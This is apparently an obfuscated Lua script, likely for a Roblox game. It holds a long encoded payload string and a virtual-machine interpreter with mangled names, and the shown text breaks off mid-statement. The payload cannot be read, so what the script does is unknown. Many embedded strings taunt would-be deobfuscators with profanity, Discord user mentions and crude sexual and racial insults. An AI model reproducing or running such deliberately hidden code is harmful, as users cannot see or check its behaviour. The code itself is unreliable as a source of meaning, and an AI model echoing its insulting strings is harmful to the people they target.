نڝضڝكآؠؠزندكڪنڪسحئڪجقزد؃ڪڝكڪئټضټحنضكدزؠزڝضدجټحزدحڝټڪآحؠؠڪنككئكقسنضسئ؃حڝسڪ؃دڪآټزڝټنټككقجق؃ضآئئج؃دنحكڝ؃ټؠآسؠزؠئقززجضټسقججدڝ؃كڝئټڝآڪ؃ټن؃قؠزسقدئآجقححدڝحڝڪجآڝؠكنټقڝزنسضضسضجحسدحڝآ؃زټحؠڪنقكجزڪسټنآجڝحندضح؃ڪؠټزآدؠ؃ڪڝقحسټضقزڪحڪدن؃ئ؃دټټآضؠدكؠ؃ئزدضآئزجقجض؃قڝئټڪڪڝؠئن؃قنزضس؃ئڝقڪحد؃آڝز؃قآټؠكنجن؃ؠ؃سئض؃جنسقد؃ڝؠڪسټزحدنزكجزټنجضججڝحكدضڝڝڪڪحټآ؃نؠكسؠآسآضقئحجڝدؠ؃جڪڝټكڪننڝكنقضزسآ؃ئسجحدآجدڝحټڪآقؠئكڪقټآآضڝئنجضئن؃ؠڝزڪدټ؃؃ڝنحقټزقك؃ئڪجنحئحدجدڪضټدؠؠ؃ئكدزآسزضقنححقدئڝڪحئټئآ؃ننكسق؃سڝنڪئدحآدزجټڪټټكآجآ؃كآقئز؃ضنؠدج؃دؠ؃سڝزڝئآزؠجكټؠؠزجضڝئكجئدڝ؃ڪئټڪ؃آؠؠسټئقآزقسحضڝسڝحج؃ڝڝكڪنآڝؠننضكسڪ؃سسضحجآسحدحڝڪڪقټئؠڪنټڪآزڝسنضضزؠحؠدز؃دڝڪټنآحنڪكقنڝسڪضكئئجضجح؃ضڝدټؠ؃؃ؠدكټقززحضټئآقؠدڪ؃كڝئدكآنؠسن؃كټنټسدئټجزئڝ؃ټڝقڪجټئټدنئك؃زنكڝض؃جآحسددڝآڪؠحنؠټنقكجؠقسكضضجڝحڪسټ؃؃ڪؠټسڝآنآكققحزڝقڝئجحڝدكئڪڪڝټنآضآحټحقسزجضآكئجحدټ؃قڝجڝآآكؠزكڝقنزضسحئؠئقحد؃آڝؠڪحڝئؠقنجقڪككسئئڝجڪحضدئڝؠ؃قټدټآنزكحقدسقضزجڪؠحدئدڝڪنټضآئنؠكنقدننضزضئحټدق؃قڪڪڝڪآئنڝكنقضز؃ضؠئنجدح؃؃زڝزټټټقؠجكڪقآزئڪدئنجكح؃؃ؠڝسڪدټ؃ؠزنجقټزقسجئڪجكحئدئڝنڪضټ؃آ؃نسنجؠجسزضقجټؠټدجڝڪڪكڪسڝضننكآق؃كحضسئدحآجز؃حڪټټڝآجؠضككؠؠسڝسآئضج؃حئ؃سئڪټآآزؠحكټققزجسضئكجټدڝ؃آڝضڪ؃آؠؠسنزقآزټسحضئجقجج؃ڪڝكڪكآڝټ؃نضكسزؠزقضدجآحټدح؃ؠڪقټجؠڪؠؠكئزڝزدضضسزحؠدس؃د؃آټزآحؠئكققنسڪزؠئئئڝدن؃ضڝزټؠآټؠدحضقزكحآسئقجندڪد؃ڝئدټآنآزآسقؠزڪسدضدجزحح؃ټڝقڪجآڪآحنئك؃زنسضض؃ئټحسدد؃سڪزئكؠټنقكجزڪسكضئئضحندؠ؃؃ڝضټسټدنآكزقزسټؠڪئججئدكجئڪڝټنآنؠ؃؃ؠقسټحضآضكجحدټ؃ڪڝجڪحآكؠئكڝكآزضس؃ضحجسجڪ؃آڝزڪحآټؠقنجكئزكسسئڝجآحضح؃ڝؠڪسټسؠآآنكحقجسقضجضجحكدنڝڝڪنټضآدنؠنقټحسآضڪئحكسدق؃جڪڪڪؠآئنڝنحقضڝڝضؠئسجدحڪ؃زڝحڪسآقټنكڪقكزئزڝئنجضحك؃ؠڝڝڪدجڪؠزؠئقټزقسڪئڪضؠحئ؃ڝڝنڪضټ؃ؠؠنڝكدقزسزضئجټئقدجڝڪڝحټئآقنندڪق؃قؠضسئدجضدز؃ؠڪټدسآجنڪككقئززضنئزج؃دټ؃سڝدټآآزؠككټقڝزجسسئكئئحؠ؃نڝؠڪ؃ټسؠسنققآقزسڪئټجټحجسحڝكڪنآڝؠنټزك؃زڝسسضسجآحقدح؃ټڝئټجآدنكآڪزڝسڪضضضحزڪدس؃ضڪآڝڪآحنټكقنجسڪضكئقحڝدڪ؃ضسحټؠټقؠدكآقټزحقڝئقججدڪ؃كڝئټڝآڪؠضنسقؠزقسدسآجزححددڝقڪزآڪ؃آنئقڝزنسضضسجؠحكددڝآڪزټحؠټنقكززڪسڝضئئدحندض؃؃ڪؠټؠآدنآكزقجسټققئجحڪدڪ؃ئجڝټنټضؠ؃نټقسزدسحئزؠجدټ؃قڝجڪئحڪؠئنضقنڝضس؃ئآجسحح؃آڝؠجنآټؠقنج؃ڪزكسضئڝئآحقد؃؃دڪسضؠؠآنزكحقجآټضجئئحككئڝڝڪؠټضآدنؠكنټكسآضزئحنټدق؃ئڪڪڪؠآزنڝن؃قضكدضؠئسجدححدڝڝحڪجآقجدكڪقنزئضڝئنجكزق؃ؠڝسڪدئنؠزنجقټزآؠؠئڪجكحئقڝڝنڪسټ؃آټنككدقحسززسجټحقدجدڪضحټئآضننكؠق؃ڝضضسضجئآدز؃قڪټسحآجنڪككقئزقضنئؠج؃دؠ؃سڝضټآټزؠحكټقڪزجزحئكجسدڝدنڝضڪ؃ټدؠسؠؠقآزؠسحزټجقحجدئڝكحدآڝجڝنضن؃زؠسسضزجآنجدح؃حڪقڪضؠڪنككؠزڝڝئضضئ؃حؠدس؃دڪآټڝآحؠجكققجسڪضكئئحڝحد؃ضڝحټؠآزؠدنڪقززحسئئقنكدڪ؃كڝئڝدآنؠضنققؠكټسدئآجزئحدڪڝقڪؠآڪآدنئ؃دزنززسكجؠج؃ددجڪڪزټحؠټنقكجزڪزدضئئكحندز؃؃؃ؠټسآدؠئكزقنسټټڪئجئڪدك؃ئڝزټنآټؠ؃ڝنقسكدضآئزجندټد؃ڝجدجآكټئكڝقنزټس؃ضججسضټ؃آڝزڪحآټؠڝنجك؃زكسسئڝضنحضد؃؃حڪسټقؠآدؠكحقڝسقضجئسحكدؠڝڝڪنټضآ؃نؠكسققسآضكئححڝدق؃كضجټكآؠنڝججقضزدضؠئزجدح؃ضڝڝحټټآقئآكڪقنزئسجنحجضح؃؃ؠقڝڪدآټؠزنئڪڝزقسنئڪجكحئ؃ڝڝنڝز؃كؠؠنټكدنؠسزضحجټجندجڝڪڝ؃ټئڪڪننكضق؃زټضسئدجئدز؃جڪټټقآجنڪككقئزسضنئزج؃دآ؃سڝدټآآزؠحكټقكزجضڪئك");local ___ll=(24+-#{(function()return#{('BLbBPP'):find("\98")}>0 and 1 or 0 end);{};'}'})local __=43 local _l=__l;local _={}_={[(((-42-0x3)+64)+-#"moonsec v4 out now")]=function()local __l,_ll,_lll,_=___lll(__l_ll,_l,_l+_lllll);_l=_l+___l_;__=(__+(___ll*___l_))%___;return(((_+__-(___ll)+_l_*(___l_*_llll))%_l_)*((_llll*_ll_ll)^_llll))+(((_lll+__-(___ll*_llll)+_l_*(_llll^_lllll))%___)*(_l_*___))+(((_ll+__-(___ll*_lllll)+_ll_ll)%___)*_l_)+((__l+__-(___ll*___l_)+_ll_ll)%___);end,[(256/0x80)]=function(_,_,_)local _=___lll(__l_ll,_l,_l);_l=_l+_lll;__=(__+(___ll))%___;return((_+__-(___ll)+_ll_ll)%_l_);end,[((6048/0xbd)+-#[[Get it bc perth needs to stfu]])]=function()local _,_ll=___lll(__l_ll,_l,_l+_llll);__=(__+(___ll*_llll))%___;_l=_l+_llll;return(((_ll+__-(___ll)+_l_*(_llll*___l_))%_l_)*___)+((_+__-(___ll*_llll)+___*(_llll^_lllll))%_l_);end,[(-#[[hi skid]]+(0x995/(485-0x106)))]=function(__,_,_l)if _l then local _=(__/_llll^(_-__l))%_llll^((_l-_lll)-(_-__l)+_lll);return _-_%__l;else local _=_llll^(_-_lll);return(__%(_+_)>=_)and __l or _____;end;end,[(114-0x6d)]=function()local _l=_[(-#'stOP READING MY CODE!'+(142-0x78))]();local __=_[(-0x7a+123)]();local __ll=__l;local _ll=(_[(117-0x71)](__,_lll,_l_lll+___l_)*(_llll^(_l_lll*_llll)))+_l;local _l=_[(0x3c-56)](__,21,31);local _=((-__l)^_[(0x348/210)](__,32));if(_l==_____)then if(_ll==__llll)then return _*_____;else _l=_lll;__ll=__llll;end;elseif(_l==(_l_*(_llll^_lllll))-_lll)then return(_ll==_____)and(_*(_lll/__llll))or(_*(_____/__llll));end;return _ll__l(_,_l-((___*(___l_))-__l))*(__ll+(_ll/(_llll^_l___l)));end,[(0x198/68)]=function(_ll,__ll,__ll)local __ll;if(not _ll)then _ll=_[(-#[[Join LD 2 nerds]]+(0x60/(0x82-124)))]();if(_ll==_____)then return'';end;end;__ll=__ll_l(__l_ll,_l,_l+_ll-__l);_l=_l+_ll;local _=''for _l=_lll,#__ll do _=_l_l_l(_,____ll((___lll(__ll_l(__ll,_l,_l))+__)%___))__=(__+___ll)%_l_ end return _;end}local function __ll_l(...)return{...},_lll_l('#',...)end local function _ll_ll()local ___l={};local _ll={};local _l={};local __ll={___l,_ll,nil,_l};local __={}local _l__=((9052/0x7c)+-#'big harry black guy nuts')local _l={[((0x80-(-#"Rogue Lineage"+(9996/0x62)))+-#"You have deobuscated the code well done")]=(function(_l)return not(#_l==_[(238/0x77)]())end),[(89-0x57)]=(function(_l)return _[((0x5c-69)+-#[[paster haha paster]])]()end),[(21-0x14)]=(function(_l)return _[((-0x63+137)+-#'how many meme strings do we have')]()end),[(-#'press this check button below the message'+(0x7c+-79))]=(function(_l)local __=_[(-#'<@!519139355118534656>'+(0xa3-135))]()local _l=''local _=1 for _ll=1,#__ do _=(_+_l__)%___ _l=_l_l_l(_l,____ll((___lll(__:sub(_ll,_ll))+_)%_l_))end return _l end)};for _=_lll,_[(-#'loadstring()'+(-101+0x72))]()do _ll[_-_lll]=_ll_ll();end;__ll[3]=_[((-122+0x88)+-#[[i love perth]])]();local _ll=_[((0x73+-99)+-#"Luraph v14 ETA?")]()for _ll=1,_ll do local _=_[(-#'stop looking at me im showering smh'+(129+-0x5c))]();local __l;local _=_l[_%(0x73-94)];__[_ll]=_ and _({});end;for _l_=1,_[(((0xd7+-97)+-#[[can i put my balls if your jaws]])/0x57)]()do local _l=_[(0x2f-45)]();if(_[(848/0xd4)](_l,__l,_lll)==__llll)then local __ll=_[(-#'mer trolled u'+(3757/0xdd))](_l,_llll,_lllll);local _ll=_[(-0x78+124)](_l,___l_,_llll+___l_);local _l={_[(93+-0x5a)](),_[(-#[[gav for ms private]]+(91-0x46))](),nil,nil};local ___={[(0x48-72)]=function()_l[_l_l]=_[(-#'Wally loooooooves federal'+((-#"piss of"+(-0x69+3))+0x89))]();_l[_lll_]=_[((-0x4e+157)+-#[[This code was obfuscated using PSU, which stands for Penis Sucking Utilities]])]();end,[(0x34-51)]=function()_l[_ll_]=_[(51-0x32)]();end,[(28-0x1a)]=function()_l[__l_l]=_[(22/(-0x3a+80))]()-(_llll^_l_lll)end,[((32+-0x17)+-#'it7ucd')]=function()_l[_l_ll]=_[(-#[[proxide is epic]]+(-0x47+87))]()-(_llll^_l_lll)_l[____l]=_[(85+-0x52)]();end};___[__ll]();if(_[(520/0x82)](_ll,_lll,__l)==_lll)then _l[__l_]=__[_l[__l_]]end if(_[((0xba0/93)+-#[[Yeah this is getting cringe-]])](_ll,_llll,_llll)==__l)then _l[_l_l]=__[_l[_l_l]]end if(_[(-123+0x7f)](_ll,_lllll,_lllll)==_lll)then _l[____l]=__[_l[_ll__]]end ___l[_l_]=_l;end end;return __ll;end;local function __llll(_,_____,___ll)local __=_[_llll];local _l_=_[_lllll];local _=_[__l];return(function(...)local _l=__l;local ___l_=-_lll;local __l_ll={...};local _ll_ll=_lll_l('#',...)-_lll;local ____ll={};local ___lll={};local ___=_l_;local _l_=_;local _l_lll=__;local _lllll=__ll_l local __={};for _=0,_ll_ll do if(_>=___)then ____ll[_-___]=__l_ll[_+_lll];else __[_]=__l_ll[_+__l];end;end;local _=_ll_ll-___+__l local _;local ___;while true do _=_l_[_l];___=_[(-0x71+114)];_ll=(2933220)while(0x7a-70)>=___ do _ll=-_ll _ll=(2904204)while ___<=(152-0x7f)do _ll=-_ll _ll=(2891945)while ___<=((-21010/0xbf)+0x7a)do _ll=-_ll _ll=(4613088)while(33-(119+-0x5b))>=___ do _ll=-_ll _ll=(1940715)while(300/0x96)>=___ do _ll=-_ll _ll=(9715726)while(115-0x73)>=___ do _ll=-_ll for _=_[__ll],_[_ll_]do __[_]=nil;end;break;end while 3062==(_ll)/((-#'Nice constant dumper you got there'+(-0x56+3293)))do _ll=(2400510)while((146+-0x65)+-#"<@!847154787934011462> shut the fuck up@skid")<___ do _ll=-_ll local _={__,_};_[_lll][_[_llll][__l_]]=_[__l][_[_llll][_ll__]]+_[_lll][_[_llll][__l_l]];break end while(_ll)/(((0xbcfa/66)+-#[[PSU and MoonSec winning]]))==3381 do local _ll=_[__ll];local ___=_[_l___];local _l_=_ll+2 local _ll={__[_ll](__[_ll+1],__[_l_])};for _=1,___ do __[_l_+_]=_ll[_];end;local _ll=_ll[1]if _ll then __[_l_]=_ll _l=_[__l_l];else _l=_l+__l;end;break end;break;end break;end while(_ll)/((-#"lIlIlIllllIlIlIlllIlIlIlIlIlIlIlIllllI suck my nuts lIlIlIllllIlIlIlllIlIlIlIlIlIlIlIllllI"+(-127+0xb92)))==707 do _ll=(7967950)while ___<=(-#'I left a nice smiley face in the constants for ya'+(-0x2e+98))do _ll=-_ll __[_[_ll_l]]=___ll[_[_ll_]];break;end while 3650==(_ll)/((4455-0x8e0))do _ll=(3226223)while ___>(75+-0x47)do _ll=-_ll __[_[__lll]]=(_[_l__l]~=0);break end while 1573==(_ll)/((0x1081-2174))do local _l_=_[___l];local ___=_[_l___];local _ll=_l_+2 local _l_={__[_l_](__[_l_+1],__[_ll])};for _=1,___ do __[_ll+_]=_l_[_];end;local _l_=_l_[1]if _l_ then __[_ll]=_l_ _l=_[_ll_];else _l=_l+__l;end;break end;break;end break;end break;end while 3314==(_ll)/((-98+0x5d2))do _ll=(503362)while(0x588/177)>=___ do _ll=-_ll _ll=(6000852)while ___<=(-0x76+124)do _ll=-_ll local _l=_[___l]__[_l]=__[_l](_l_l_(__,_l+__l,_[_l__l]))break;end while(_ll)/((-#'water is wet'+(0x1d67-3797)))==1614 do _ll=(3254166)while(0x268/88)<___ do _ll=-_ll local ____l;local ___;local _ll_;local _ll;__[_[_l__]]=___ll[_[____]];_l=_l+__l;_=_l_[_l];__[_[__l_]]=__[_[_l_ll]][_[_lll_]];_l=_l+__l;_=_l_[_l];_ll=_[___l];_ll_=__[_[____]];__[_ll+1]=_ll_;__[_ll]=_ll_[_[_l___]];_l=_l+__l;_=_l_[_l];__[_[__ll]]=__[_[_l_l]];_l=_l+__l;_=_l_[_l];__[_[__ll]]=__[_[_l_l]];_l=_l+__l;_=_l_[_l];_ll=_[__ll]__[_ll]=__[_ll](_l_l_(__,_ll+__l,_[__l_l]))_l=_l+__l;_=_l_[_l];_ll=_[__ll];_ll_=__[_[_l_ll]];__[_ll+1]=_ll_;__[_ll]=_ll_[_[__ll_]];_l=_l+__l;_=_l_[_l];_ll=_[_ll_l]__[_ll]=__[_ll](__[_ll+_lll])_l=_l+__l;_=_l_[_l];___={__,_};___[_lll][___[_llll][_l__]]=___[__l][___[_llll][_lll_]]+___[_lll][___[_llll][_l_l]];_l=_l+__l;_=_l_[_l];__[_[__lll]]=__[_[_l_ll]]%_[_lll_];_l=_l+__l;_=_l_[_l];_ll=_[_ll_l]__[_ll]=__[_ll](__[_ll+_lll])_l=_l+__l;_=_l_[_l];_ll_=_[_l__l];____l=__[_ll_]for _=_ll_+1,_[__l__]do ____l=____l..__[_];end;__[_[_l__]]=____l;_l=_l+__l;_=_l_[_l];___={__,_};___[_lll][___[_llll][_l__]]=___[__l][___[_llll][_lll_]]+___[_lll][___[_llll][_l_l]];_l=_l+__l;_=_l_[_l];__[_[__lll]]=__[_[____]]%_[_lll_];break end while(_ll)/(((-0x6f+3262)+-#'reject psu return to moonsec'))==1042 do local _ll=_[__ll];local _l_=__[_ll+2];local __l=__[_ll]+_l_;__[_ll]=__l;if(_l_>0)then if(__l<=__[_ll+1])then _l=_[_l_l];__[_ll+3]=__l;end elseif(__l>=__[_ll+1])then _l=_[__l_l];__[_ll+3]=__l;end break end;break;end break;end while(_ll)/((0xb120/208))==2309 do _ll=(7675200)while(-106+0x74)>=___ do _ll=-_ll _ll=(1566884)while(0x4a+-65)<___ do _ll=-_ll if(__[_[___l]]==__[_[__ll_]])then _l=_l+_lll;else _l=_[_l__l];end;break end while(_ll)/((0x4fe-682))==2629 do local _ll;__[_[_ll_l]]={};_l=_l+__l;_=_l_[_l];__[_[_ll_l]][_[_ll_]]=__[_[____l]];_l=_l+__l;_=_l_[_l];__[_[_ll_l]][_[_l__l]]=__[_[____l]];_l=_l+__l;_=_l_[_l];__[_[_ll_l]][_[_l_l]]=_[_ll__];_l=_l+__l;_=_l_[_l];__[_[___l]][_[__l_l]]=__[_[__ll_]];_l=_l+__l;_=_l_[_l];__[_[_l__]]=___ll[_[_l_ll]];_l=_l+__l;_=_l_[_l];__[_[__l_]]=__[_[_l_l]];_l=_l+__l;_=_l_[_l];_ll=_[__ll]__[_ll](__[_ll+_lll])_l=_l+__l;_=_l_[_l];__[_[__l_]]=___ll[_[____]];_l=_l+__l;_=_l_[_l];__[_[__ll]]=___ll[_[_ll_]];break end;break;end while 3900==(_ll)/((0xfc7-2071))do _ll=(10740552)while ___>((-48+0x64)+-#'oh oh i will hack you =opens dev console=')do _ll=-_ll __[_[__lll]][_[__l_l]]=__[_[__l__]];break end while(_ll)/((-46+((0x19b7-3300)+-#"perth thinks psu is bad (it is) and uses ms priv")))==3368 do local _l=_[__lll]__[_l]=__[_l](_l_l_(__,_l+__l,_[__l_l]))break end;break;end break;end break;end break;end while(_ll)/((1894+-0x27))==1559 do _ll=(8965026)while((0x154-213)+-#'<@761654159095103499> <@761654159095103499> <@761654159095103499> <@761654159095103499> <@761654159095103499>')>=___ do _ll=-_ll _ll=(477090)while((-#"This script has been obfuscated using your mom"+(-100+0x731))/0x71)>=___ do _ll=-_ll _ll=(465555)while ___<=(0xa35/201)do _ll=-_ll local _ll=_[_l_l];local _l=__[_ll]for _=_ll+1,_[_lll_]do _l=_l..__[_];end;__[_[__ll]]=_l;break;end while 205==(_ll)/((143073/0x3f))do _ll=(362957)while ___>(113-0x63)do _ll=-_ll local _l=_[_ll_l];local _ll=__[_l];for _=_l+1,_[_l_l]do _l__ll(_ll,__[_])end;break end while 133==(_ll)/(((604440/0xdb)+-#'i love minecraft what about you'))do __[_[__l_]]=_____[_[_l_l]];break end;break;end break;end while(_ll)/((-#[[Yeah this is getting cringe-]]+(-0x49+1868)))==270 do _ll=(8685785)while(0x9c-140)>=___ do _ll=-_ll __[_[_l__]]=___ll[_[____]];break;end while 3053==(_ll)/((2892+-0x2f))do _ll=(1775820)while(4131/0xf3)<___ do _ll=-_ll ___ll[_[_l_l]]=__[_[_l__]];break end while(_ll)/((((0x1aa7c+-26)+-#"return nil end")/214))==3482 do local _l=_[_ll_l];local _ll=__[_[____]];__[_l+1]=_ll;__[_l]=_ll[_[____l]];break end;break;end break;end break;end while(_ll)/((((0x3ceb-7843)+-#[[obfuscator tooooo gooood]])-0xf2a))==2331 do _ll=(9520410)while ___<=(111-0x5a)do _ll=-_ll _ll=(3959130)while(152/0x8)>=___ do _ll=-_ll local _=_[__ll]local _ll,_l=_lllll(__[_](__[_+_lll]))___l_=_l+_-__l local _l=0;for _=_,___l_ do _l=_l+__l;__[_]=_ll[_l];end;break;end while 1785==(_ll)/((527884/0xee))do _ll=(3469092)while ___>(0x79+-101)do _ll=-_ll __[_[___l]]={};break end while 902==(_ll)/((0xa451a/175))do __[_[___l]]=#__[_[_ll_]];break end;break;end break;end while(_ll)/(((313548/(-#'This file has been enchanted with uncrackable V, fuck the fuck off'+(170+-0x11)))+-#'Arse Bloody Bugger Cow Crap Damn Ginger Git God Goddam Jesus Christ Minger'))==2697 do _ll=(4077468)while(0x9d-134)>=___ do _ll=-_ll _ll=(3386981)while ___>((-17876/0xa4)+0x83)do _ll=-_ll __[_[___l]]=_____[_[__l_l]];_l=_l+__l;_=_l_[_l];__[_[___l]]=#__[_[_ll_]];_l=_l+__l;_=_l_[_l];_____[_[_ll_]]=__[_[_l__]];_l=_l+__l;_=_l_[_l];__[_[__l_]]=_____[_[__l_l]];_l=_l+__l;_=_l_[_l];__[_[_l__]]=#__[_[_l_ll]];_l=_l+__l;_=_l_[_l];_____[_[_l__l]]=__[_[_l__]];_l=_l+__l;_=_l_[_l];do return end;break end while(_ll)/((-#'it7ucd'+(0x8cc-1167)))==3139 do local _lll;local ___;local _ll;__[_[___l]]=_[____];_l=_l+__l;_=_l_[_l];__[_[__l_]]=_[__l_l];_l=_l+__l;_=_l_[_l];__[_[__lll]]=#__[_[_l_ll]];_l=_l+__l;_=_l_[_l];__[_[__ll]]=_[_ll_];_l=_l+__l;_=_l_[_l];_ll=_[_ll_l];___=__[_ll]_lll=__[_ll+2];if(_lll>0)then if(___>__[_ll+1])then _l=_[____];else __[_ll+3]=___;end elseif(___<__[_ll+1])then _l=_[__l_l];else __[_ll+3]=___;end break end;break;end while(_ll)/((0x172a0/40))==1719 do _ll=(8892342)while ___>(-#'This file has been enchanted with uncrackable V, fuck the fuck off'+(-102+0xc0))do _ll=-_ll local _ll;__[_[__ll]]=_[_l_l];_l=_l+__l;_=_l_[_l];_ll=_[__ll]__[_ll]=__[_ll](_l_l_(__,_ll+__l,_[_l_ll]))_l=_l+__l;_=_l_[_l];__[_[__lll]]=__[_[_l__l]][_[_ll__]];_l=_l+__l;_=_l_[_l];__[_[_l__]]=__[_[_l__l]][_[_lll_]];_l=_l+__l;_=_l_[_l];__[_[__l_]]=__[_[_ll_]][_[_lll_]];_l=_l+__l;_=_l_[_l];__[_[_l__]]=__[_[_ll_]][_[_lll_]];_l=_l+__l;_=_l_[_l];_ll=_[_ll_l]__[_ll]=__[_ll](__[_ll+_lll])_l=_l+__l;_=_l_[_l];__[_[_l__]]=__[_[_l__l]][_[____l]];_l=_l+__l;_=_l_[_l];__[_[___l]]=_[_l__l];_l=_l+__l;_=_l_[_l];_ll=_[__ll]__[_ll]=__[_ll](__[_ll+_lll])break end while(_ll)/((-#[[This file has been enchanted with uncrackable V, fuck the fuck off]]+(0x176c-3041)))==3078 do if __[_[_ll_l]]then _l=_l+__l;else _l=_[_l_ll];end;break end;break;end break;end break;end break;end break;end while(_ll)/((633000/0xfa))==1147 do _ll=(1696032)while((-53+0x87)+-#[[If you see this I fucked your mom last night]])>=___ do _ll=-_ll _ll=(734077)while(4712/0x98)>=___ do _ll=-_ll _ll=(1870055)while((-0x2f+95)+-#"no i legit burned it")>=___ do _ll=-_ll _ll=(5615688)while(2210/0x55)>=___ do _ll=-_ll _l=_[_ll_];break;end while 1599==(_ll)/((0xe2f+-119))do _ll=(2258319)while ___>(0xf81/147)do _ll=-_ll __[_[__l_]]=__[_[_l_ll]]-__[_[__ll_]];break end while(_ll)/(((0x5c4-783)+-#"moonsec source: if code then obfuscate end"))==3469 do local _ll=_[_ll_l];local __l=__[_ll]local _l_=__[_ll+2];if(_l_>0)then if(__l>__[_ll+1])then _l=_[_l_l];else __[_ll+3]=__l;end elseif(__l<__[_ll+1])then _l=_[__l_l];else __[_ll+3]=__l;end break end;break;end break;end while 1331==(_ll)/((2849-0x5a4))do _ll=(3390186)while ___<=((-#[[LOL ur gonna fail probs]]+(232+-0x75))-63)do _ll=-_ll __[_[__ll]]=__[_[_l_l]];break;end while 2094==(_ll)/((-#'I have enchanted this script with uncrackable V, your only option is to fuck the fuck off.'+(164064/0x60)))do _ll=(1958425)while(0x40+(-0x6f+77))<___ do _ll=-_ll __[_[_ll_l]]={};break end while(_ll)/((252805/0xe9))==1805 do local _ll;local ___;__[_[_ll_l]]={};_l=_l+__l;_=_l_[_l];__[_[__lll]]=___ll[_[____]];_l=_l+__l;_=_l_[_l];__[_[___l]]=__[_[_ll_]][_[____l]];_l=_l+__l;_=_l_[_l];__[_[_l__]]=__[_[_l__l]][_[__l__]];_l=_l+__l;_=_l_[_l];__[_[__l_]]=__[_[_l_l]][_[____l]];_l=_l+__l;_=_l_[_l];__[_[__lll]]=_[_l_ll];_l=_l+__l;_=_l_[_l];___=_[_l_l];_ll=__[___]for _=___+1,_[_ll__]do _ll=_ll..__[_];end;__[_[_ll_l]]=_ll;_l=_l+__l;_=_l_[_l];__[_[__l_]][_[_ll_]]=__[_[__ll_]];_l=_l+__l;_=_l_[_l];__[_[_l__]]={};_l=_l+__l;_=_l_[_l];__[_[_l__]]={};break end;break;end break;end break;end while(_ll)/(((1025-0x210)+-#'True'))==1489 do _ll=(5549128)while ___<=(0x91-111)do _ll=-_ll _ll=(2932767)while ___<=(-#'This file has been enchanted with uncrackable V, fuck the fuck off'+(0xf2-144))do _ll=-_ll ___ll[_[_l_ll]]=__[_[___l]];break;end while(_ll)/(((0x6c2-911)+-#[[I have enchanted this script with uncrackable V, your only option is to fuck the fuck off.]]))==4023 do _ll=(7461726)while ___>(-96+0x81)do _ll=-_ll __[_[___l]]=#__[_[_l__l]];break end while(_ll)/((-0x18+2687))==2802 do local _l=_[_ll_l]local _l_={__[_l](_l_l_(__,_l+1,___l_))};local _ll=0;for _=_l,_[_lll_]do _ll=_ll+__l;__[_]=_l_[_ll];end break end;break;end break;end while 1864==(_ll)/((-27+0xbbc))do _ll=(6136284)while ___<=(-#[[what is an opcode]]+((-32+0x29c)/0xc))do _ll=-_ll _ll=(8593186)while ___>(0x3a+-23)do _ll=-_ll local ___;local _ll_;local _ll;__[_[___l]]=___ll[_[_l_l]];_l=_l+__l;_=_l_[_l];__[_[_l__]]=__[_[____]];_l=_l+__l;_=_l_[_l];_ll=_[__l_]__[_ll]=__[_ll](__[_ll+_lll])_l=_l+__l;_=_l_[_l];__[_[__ll]]=__[_[_l_ll]][_[____l]];_l=_l+__l;_=_l_[_l];_ll=_[__lll]_ll_={__[_ll](__[_ll+1])};___=0;for _=_ll,_[_lll_]do ___=___+__l;__[_]=_ll_[___];end _l=_l+__l;_=_l_[_l];_l=_[_l_l];break end while(_ll)/(((603402/0xc9)+-#[[hey psst you the wrapper function is right there]]))==2909 do if(__[_[_ll_l]]~=__[_[____l]])then _l=_l+_lll;else _l=_[__l_l];end;break end;break;end while 1603==(_ll)/((0xf53+-95))do _ll=(7611384)while ___>(0xe2a/98)do _ll=-_ll local _ll;local ___;local ___l;__[_[__ll]]=_[_l_ll];_l=_l+__l;_=_l_[_l];__[_[__ll]]=__[_[_l__l]];_l=_l+__l;_=_l_[_l];__[_[__l_]]=_[_ll_];_l=_l+__l;_=_l_[_l];___l=_[_l_ll];___=__[___l]for _=___l+1,_[__ll_]do ___=___..__[_];end;__[_[__ll]]=___;_l=_l+__l;_=_l_[_l];__[_[__ll]][_[_l_l]]=__[_[____l]];_l=_l+__l;_=_l_[_l];__[_[__lll]][_[__l_l]]=_[____l];_l=_l+__l;_=_l_[_l];__[_[_l__]]=___ll[_[_l_l]];_l=_l+__l;_=_l_[_l];__[_[__ll]]=_[__l_l];_l=_l+__l;_=_l_[_l];_ll=_[_l__]__[_ll]=__[_ll](__[_ll+_lll])_l=_l+__l;_=_l_[_l];__[_[_ll_l]][_[_l_ll]]=__[_[__ll_]];break end while(_ll)/((-#'daddy chill'+(2716+-0x54)))==2904 do local _=_[___l]__[_]=__[_](__[_+_lll])break end;break;end break;end break;end break;end while 3744==(_ll)/((-#[[chrome sex me]]+(515+(0x36+-103))))do _ll=(11277918)while ___<=(0x2bf2/250)do _ll=-_ll _ll=(4129107)while ___<=(0x87-94)do _ll=-_ll _ll=(6239072)while ___<=((7597/0x6b)+-#'Rynin babasi kredi borcuna girdi')do _ll=-_ll local _ll;local ___;local _ll_,_llll;local __l_;local _ll;__[_[__lll]]=___ll[_[____]];_l=_l+__l;_=_l_[_l];__[_[__lll]]=___ll[_[_l_ll]];_l=_l+__l;_=_l_[_l];__[_[__lll]]=__[_[_l_l]][_[_ll__]];_l=_l+__l;_=_l_[_l];__[_[__ll]]=__[_[____]][_[__ll_]];_l=_l+__l;_=_l_[_l];__[_[_l__]]=__[_[__l_l]][_[_ll__]];_l=_l+__l;_=_l_[_l];_ll=_[__lll];__l_=__[_[__l_l]];__[_ll+1]=__l_;__[_ll]=__l_[_[____l]];_l=_l+__l;_=_l_[_l];_ll=_[___l]_ll_,_llll=_lllll(__[_ll](__[_ll+_lll]))___l_=_llll+_ll-__l ___=0;for _=_ll,___l_ do ___=___+__l;__[_]=_ll_[___];end;_l=_l+__l;_=_l_[_l];_ll=_[__ll]_ll_={__[_ll](_l_l_(__,_ll+1,___l_))};___=0;for _=_ll,_[_l___]do ___=___+__l;__[_]=_ll_[___];end _l=_l+__l;_=_l_[_l];_l=_[_l_ll];break;end while 2576==(_ll)/((0x1337-2497))do _ll=(3392863)while ___>(0xed8/95)do _ll=-_ll __[_[__l_]]=__[_[_l__l]]%_[_l___];break end while(_ll)/((-67+0xfba))==857 do __[_[_l__]]=__[_[____]]%_[_l___];break end;break;end break;end while 2697==(_ll)/(((0x2fae4/(0x6254/203))+-#"<@!847154787934011462> shut the fuck up@skid"))do _ll=(1536088)while(0xb8-141)>=___ do _ll=-_ll _ll=(1854702)while(0x7e+-84)<___ do _ll=-_ll __[_[__l_]]=__[_[_ll_]][__[_[_lll_]]];break end while(_ll)/((-#'teefus more like pedofus'+((-0x41+1396)-690)))==3006 do local ___;local 